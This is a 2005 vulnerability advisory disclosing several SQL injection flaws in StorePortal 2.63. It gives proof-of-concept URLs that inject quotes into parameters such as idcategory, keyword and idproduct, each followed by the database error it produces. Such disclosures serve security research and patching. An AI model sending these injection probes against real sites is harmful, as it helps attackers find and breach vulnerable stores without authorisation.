|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Sunday, 24 April 2005 15:28 |
 Dcrab "s Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab"s Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Multiple SQL Injections in StorePortal 2.63
Date: 24/04/2005
Vendor: StorePortal
Vendor Website: http://www.storeportal.com/
Summary: There are, multiple sql injections in storeportal 2.63.
Proof of Concept Exploits:
These sql injections are caused by the referrer, of these pages called, and are only exploitable if u visit them after visiting
default.asp
http://localhost/default.asp?language="sqlinjection
SQL INJECTION
ERROR MESSAGE !
Store Portal Errors Occured!
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression
""/default.asp?language="sqlinjection&","")".
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
http://localhost/default.asp?id=1&opr=2&%3bpic="sql_injection_
SQL INJECTION
ERROR MESSAGE !
Store Portal Errors Occured!
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression
""/default.asp?id=1&opr=2&pic="sql_injection_&","")".
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
http://localhost/default.asp?opr=35&id=1&idcategory="sql_injection_&idcategoryp=1
SQL INJECTION
ERROR MESSAGE !
Store Portal Errors Occured!
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression
""/default.asp?opr=35&id=1&idcategory="sql_injection_&idcategoryp=1&","")".
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
http://localhost/default.asp?opr=35&id=1&idcategory=1&idcategoryp="sql_injection_
SQL INJECTION
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression
""/default.asp?opr=35&id=1&idcategory=1&idcategoryp="sql_injection_&","")".
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
http://localhost/default.asp?mnu=&id=1&opr=5&content="sql_injection_
SQL INJECTION
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression
""/default.asp?mnu=&id=1&content="sql_injection_&opr=5&","")".
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
http://localhost/default.asp?id=1&opr=4&keyword="sql_injection_
SQL INJECTION
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression "IdCategoriaInfo = 1 and
Visible =
"true" and "20050424" >= DataPubblicazione and (DataExpire <= " 20050424" or DataExpire is null or DataExpire = "") and (Name like
"%"sql_injection_%" or Body like "%"sql_injection_%")".
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
http://localhost/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct="sql_injection_
SQL INJECTION
ERROR MESSAGE !
Store Portal Errors Occured!
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression
""/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct="sql_injection_&","")".
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel
free to
contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for
my soon to come
out book on Secure coding with php.
|
